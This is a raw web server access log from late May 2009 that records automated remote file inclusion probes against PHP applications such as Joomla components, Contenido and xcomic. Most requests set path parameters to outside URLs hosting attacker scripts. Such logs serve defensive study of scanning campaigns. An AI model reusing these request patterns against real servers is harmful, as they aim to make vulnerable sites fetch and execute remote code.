216.17.99.13 - - [29/May/2009:19:59:41 -0500] "GET /logs/access_log.1242086400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:20:00:37 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:20:00:37 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:20:00:37 -0500] "GET /logs/access_log.1239753600///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 383 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:20:00:37 -0500] "GET /logs/access_log.1234828800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 383 "-""Mozilla/5.0"
61.38.53.248 - - [29/May/2009:20:02:58 -0500] "GET /logs//viewbody.html?code=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
61.38.53.248 - - [29/May/2009:20:02:58 -0500] "GET /logs/access_log.1240531200//viewbody.html?code=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
61.38.53.248 - - [29/May/2009:20:02:58 -0500] "GET //viewbody.html?code=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
218.146.255.11 - - [29/May/2009:20:03:02 -0500] "GET /logs//viewbody.html?code=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
218.146.255.11 - - [29/May/2009:20:03:02 -0500] "GET /logs/access_log.1240531200//viewbody.html?code=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.146.255.11 - - [29/May/2009:20:03:02 -0500] "GET //viewbody.html?code=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
62.149.194.73 - - [29/May/2009:20:04:14 -0500] "GET /logs//coppercop/theme.php?THEME_DIR=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
62.149.194.73 - - [29/May/2009:20:04:14 -0500] "GET //coppercop/theme.php?THEME_DIR=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.803"
65.98.80.2 - - [29/May/2009:20:04:51 -0500] "GET /logs/access_log.1239753600///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 383 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:20:04:51 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:20:04:52 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:20:04:52 -0500] "GET /logs/access_log.1234828800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 383 "-""Mozilla/5.0"
195.34.78.110 - - [29/May/2009:20:05:20 -0500] "GET /logs//coppercop/theme.php?THEME_DIR=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
195.34.78.110 - - [29/May/2009:20:05:20 -0500] "GET //coppercop/theme.php?THEME_DIR=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
61.38.53.248 - - [29/May/2009:20:08:41 -0500] "GET /logs//viewbody.html?code=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
61.38.53.248 - - [29/May/2009:20:08:41 -0500] "GET /logs/access_log.1240531200//viewbody.html?code=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
61.38.53.248 - - [29/May/2009:20:08:41 -0500] "GET //viewbody.html?code=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
85.119.154.129 - - [29/May/2009:20:10:20 -0500] "GET /logs//errors.php?error=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
85.119.154.129 - - [29/May/2009:20:10:20 -0500] "GET //errors.php?error=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.172.33.230 - - [29/May/2009:20:13:11 -0500] "GET /logs//viewbody.html?code=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
209.172.33.230 - - [29/May/2009:20:13:11 -0500] "GET //viewbody.html?code=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
209.172.33.230 - - [29/May/2009:20:13:11 -0500] "GET /logs/access_log.1240531200//viewbody.html?code=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
85.119.154.129 - - [29/May/2009:20:15:02 -0500] "GET /logs//errors.php?error=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
85.119.154.129 - - [29/May/2009:20:15:03 -0500] "GET //errors.php?error=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
85.119.154.129 - - [29/May/2009:20:15:16 -0500] "GET /logs//errors.php?error=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
85.119.154.129 - - [29/May/2009:20:15:16 -0500] "GET //errors.php?error=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
85.119.154.129 - - [29/May/2009:20:15:17 -0500] "GET /logs//errors.php?error=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
85.119.154.129 - - [29/May/2009:20:15:17 -0500] "GET //errors.php?error=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.221.10.116 - - [29/May/2009:20:15:49 -0500] "GET ///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:20:15:49 -0500] "GET /logs///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:20:15:49 -0500] "GET /logs/access_log.1233014400///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:20:15:55 -0500] "GET ///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:20:15:55 -0500] "GET /logs/access_log.1233014400///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:20:15:55 -0500] "GET /logs///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
209.25.133.199 - - [29/May/2009:20:15:59 -0500] "GET /logs/prog/pl_menu/show_menu.php?binn_include_path=http://www.runway34.ch/cms/r0x.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
209.25.133.199 - - [29/May/2009:20:15:59 -0500] "GET /prog/pl_menu/show_menu.php?binn_include_path=http://www.runway34.ch/cms/r0x.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
216.221.10.116 - - [29/May/2009:20:16:00 -0500] "GET /logs/access_log.1236643200///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
85.119.154.129 - - [29/May/2009:20:16:03 -0500] "GET /logs//errors.php?error=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
85.119.154.129 - - [29/May/2009:20:16:03 -0500] "GET //errors.php?error=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
65.98.80.2 - - [29/May/2009:20:16:04 -0500] "GET ///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:20:16:04 -0500] "GET /logs/access_log.1233014400///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:20:16:04 -0500] "GET /logs///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:20:16:08 -0500] "GET /logs/access_log.1236643200///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
85.119.154.129 - - [29/May/2009:20:16:11 -0500] "GET /logs//errors.php?error=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
85.119.154.129 - - [29/May/2009:20:16:11 -0500] "GET //errors.php?error=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
65.98.80.2 - - [29/May/2009:20:16:13 -0500] "GET /logs/access_log.1236643200///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
195.34.78.110 - - [29/May/2009:20:18:26 -0500] "GET /logs///xcomic/initialize.php?xcomicRootPath=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
195.34.78.110 - - [29/May/2009:20:18:26 -0500] "GET ///xcomic/initialize.php?xcomicRootPath=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
62.149.194.73 - - [29/May/2009:20:18:33 -0500] "GET /logs///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
62.149.194.73 - - [29/May/2009:20:18:34 -0500] "GET ///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
65.98.80.2 - - [29/May/2009:20:19:50 -0500] "GET /logs/access_log.1233014400///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:20:19:50 -0500] "GET ///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:20:19:50 -0500] "GET /logs///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:20:19:59 -0500] "GET /logs/access_log.1236643200///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
77.221.130.17 - - [29/May/2009:20:20:18 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
77.221.130.17 - - [29/May/2009:20:20:18 -0500] "GET /logs/access_log.1240531200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
77.221.130.17 - - [29/May/2009:20:20:18 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
195.34.78.110 - - [29/May/2009:20:20:19 -0500] "GET /logs///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
195.34.78.110 - - [29/May/2009:20:20:19 -0500] "GET ///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
209.25.133.199 - - [29/May/2009:20:20:51 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.runway34.ch/cms/r0x.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
209.25.133.199 - - [29/May/2009:20:20:51 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.runway34.ch/cms/r0x.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
65.55.106.155 - - [29/May/2009:20:22:55 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.155 - - [29/May/2009:20:23:38 -0500] "GET /logs/access_log.1203811200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.30.142.167 - - [29/May/2009:20:26:15 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.167 - - [29/May/2009:20:26:15 -0500] "GET /logs/access_log.1228608000 HTTP/1.0" 200 12125 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.149.194.73 - - [29/May/2009:20:27:29 -0500] "GET /logs///xcomic/initialize.php?xcomicRootPath=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.803"
62.149.194.73 - - [29/May/2009:20:27:30 -0500] "GET ///xcomic/initialize.php?xcomicRootPath=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
62.149.194.73 - - [29/May/2009:20:27:30 -0500] "GET /logs///xcomic/initialize.php?xcomicRootPath=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.803"
62.149.194.73 - - [29/May/2009:20:27:30 -0500] "GET ///xcomic/initialize.php?xcomicRootPath=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
65.55.106.214 - - [29/May/2009:20:29:09 -0500] "GET /logs/access_log.1194480000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
116.36.213.166 - - [29/May/2009:20:29:24 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
116.36.213.166 - - [29/May/2009:20:29:24 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
116.36.213.166 - - [29/May/2009:20:29:24 -0500] "GET /logs/access_log.1240531200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
218.146.255.11 - - [29/May/2009:20:30:04 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.146.255.11 - - [29/May/2009:20:30:04 -0500] "GET /logs/access_log.1240531200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
218.146.255.11 - - [29/May/2009:20:30:05 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
209.172.33.230 - - [29/May/2009:20:31:21 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
209.172.33.230 - - [29/May/2009:20:31:29 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
209.172.33.230 - - [29/May/2009:20:31:34 -0500] "GET /logs/access_log.1240531200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
211.172.225.50 - - [29/May/2009:20:35:39 -0500] "GET /logs/erros.phphttp://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
211.172.225.50 - - [29/May/2009:20:35:40 -0500] "GET /erros.phphttp://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
77.221.130.17 - - [29/May/2009:20:37:43 -0500] "GET //plugins/payment/paymenow/paymenow.inc.php?config[root_dir]=http://www.ks-bank.ru/yes.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
77.221.130.17 - - [29/May/2009:20:37:43 -0500] "GET /logs//plugins/payment/paymenow/paymenow.inc.php?config[root_dir]=http://www.ks-bank.ru/yes.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
195.34.78.110 - - [29/May/2009:20:38:13 -0500] "GET /logs///xcomic/initialize.php?xcomicRootPath=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
195.34.78.110 - - [29/May/2009:20:38:13 -0500] "GET ///xcomic/initialize.php?xcomicRootPath=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
65.55.106.228 - - [29/May/2009:20:43:10 -0500] "GET /logs/access_log.1217116800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.17.162.28 - - [29/May/2009:20:44:58 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:20:44:58 -0500] "GET /logs/access_log.1239408000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:20:45:00 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:20:45:26 -0500] "GET /logs/access_log.1242086400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
218.234.23.43 - - [29/May/2009:20:52:07 -0500] "GET //send_reminders.php?noSet=0&includedir=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
218.234.23.43 - - [29/May/2009:20:52:07 -0500] "GET /logs/access_log.1230768000//send_reminders.php?noSet=0&includedir=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.234.23.43 - - [29/May/2009:20:52:07 -0500] "GET /logs//send_reminders.php?noSet=0&includedir=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
218.234.23.43 - - [29/May/2009:20:52:08 -0500] "GET /logs/access_log.1229299200//send_reminders.php?noSet=0&includedir=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
65.55.208.138 - - [29/May/2009:21:01:04 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.138 - - [29/May/2009:21:01:04 -0500] "GET /logs/access_log.1241654400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
89.234.63.110 - - [29/May/2009:21:01:39 -0500] "GET /?INCLUDE_FOLDER=http://e-cardonline.co.kr/excel/test.txt?? HTTP/1.1" 200 3245 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
80.237.146.58 - - [29/May/2009:21:02:29 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.nw.or.kr/bbs/icon/bajoid.txt?? HTTP/1.1" 200 191349 "-""libwww-perl/5.76"
80.237.146.58 - - [29/May/2009:21:02:29 -0500] "GET /?INCLUDE_FOLDER=http://www.nw.or.kr/bbs/icon/bajoid.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.76"
189.14.202.124 - - [29/May/2009:21:06:25 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
189.14.202.124 - - [29/May/2009:21:06:25 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
189.14.202.124 - - [29/May/2009:21:06:25 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:21:06:30 -0500] "GET /logs/access_log.1242086400//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:21:06:31 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:21:06:31 -0500] "GET /logs/access_log.1242259200//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:21:06:31 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:21:06:38 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:21:06:38 -0500] "GET /logs/access_log.1242259200//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:21:06:38 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:21:06:38 -0500] "GET /logs/access_log.1242086400//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:21:07:19 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:21:07:20 -0500] "GET /logs/access_log.1242086400//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:21:07:20 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:21:07:20 -0500] "GET /logs/access_log.1242259200//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:21:07:32 -0500] "GET /logs/access_log.1242259200//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:21:07:32 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:21:07:32 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:21:07:32 -0500] "GET /logs/access_log.1242086400//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
